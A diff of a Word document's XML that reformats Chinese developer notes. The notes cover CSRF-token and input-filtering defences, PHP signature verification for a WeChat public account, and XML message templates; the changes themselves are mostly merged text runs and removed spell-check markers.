                 <w:rFonts w:hint="eastAsia"/>
@@ -16308,14 +14838,12 @@
               </w:rPr>
               <w:t>）过滤</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>js</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -16618,28 +15146,24 @@
               </w:rPr>
               <w:t>中保存一份加密后的</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>csrfToken</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>，在服务器端与表单隐藏的</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>csrfToken</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -16670,7 +15194,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>S</w:t>
             </w:r>
@@ -16680,7 +15203,6 @@
               </w:rPr>
               <w:t>ql</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -16758,11 +15280,9 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>db.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -16890,8 +15410,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="6439"/>
-        <w:gridCol w:w="6364"/>
+        <w:gridCol w:w="6438"/>
+        <w:gridCol w:w="6365"/>
         <w:gridCol w:w="6516"/>
       </w:tblGrid>
       <w:tr>
@@ -17197,27 +15717,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>$token="</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>barret</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>";</w:t>
+              <w:t>$token="barret";</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17327,27 +15827,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>($</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>timestamp,$nonce,$token</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>($timestamp,$nonce,$token);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -17381,17 +15861,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>($</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>array,</w:t>
+              <w:t>($array,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17404,7 +15874,6 @@
               </w:rPr>
               <w:t>SORT_STRING</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -17492,27 +15961,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>tmpstr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>=</w:t>
+              <w:t>$tmpstr=</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17555,19 +16004,19 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+              <w:t>$tmpstr=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="0070C0"/>
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>tmpstr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>sha1</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -17575,47 +16024,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>=</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>sha1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>($</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>tmpstr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>($tmpstr);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -17706,27 +16115,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>($</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>tmpstr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>==$signature){</w:t>
+              <w:t>($tmpstr==$signature){</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -17769,27 +16158,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>('</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>content-type:text</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>');</w:t>
+              <w:t>('content-type:text');</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -17832,27 +16201,7 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>$_GET['</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>echostr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="0070C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>'];</w:t>
+              <w:t>$_GET['echostr'];</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18041,19 +16390,7 @@
                 <w:sz w:val="22"/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>&lt;!</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-                <w:u w:val="single"/>
-              </w:rPr>
-              <w:t>—</w:t>
+              <w:t>&lt;!—</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18180,79 +16517,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>ToUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;&lt;![CDATA[</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>toUser</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>]]&gt;&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>ToUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;ToUserName&gt;&lt;![CDATA[toUser]]&gt;&lt;/ToUserName&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18277,79 +16542,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>FromUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;&lt;![CDATA[</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>FromUser</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>]]&gt;&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>FromUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;FromUserName&gt;&lt;![CDATA[FromUser]]&gt;&lt;/FromUserName&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18374,55 +16567,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>CreateTime</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;123456789&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>CreateTime</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;CreateTime&gt;123456789&lt;/CreateTime&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18447,55 +16592,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>MsgType</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;&lt;![CDATA[event]]&gt;&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>MsgType</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;MsgType&gt;&lt;![CDATA[event]]&gt;&lt;/MsgType&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18645,65 +16742,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>ToUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;&lt;![CDATA[%s]]&gt;&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>ToUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;ToUserName&gt;&lt;![CDATA[%s]]&gt;&lt;/ToUserName&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18731,55 +16770,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>FromUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;&lt;![CDATA[%s]]&gt;&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>FromUserName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;FromUserName&gt;&lt;![CDATA[%s]]&gt;&lt;/FromUserName&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18807,55 +16798,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>CreateTime</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;%s&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>CreateTime</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;CreateTime&gt;%s&lt;/CreateTime&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -18883,55 +16826,7 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>MsgType</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;&lt;![CDATA[%s]]&gt;&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>MsgType</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:i/>
-                <w:iCs/>
-                <w:color w:val="AD95AF"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;MsgType&gt;&lt;![CDATA[%s]]&gt;&lt;/MsgType&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -19000,29 +16895,17 @@
                 <w:kern w:val="0"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="55AA55"/>
+              <w:t>$postObj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
                 <w:kern w:val="0"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>postObj</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:color w:val="585858"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
               <w:t>=</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -19034,7 +16917,6 @@
               </w:rPr>
               <w:t>simplexml_load_string</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -19051,19 +16933,8 @@
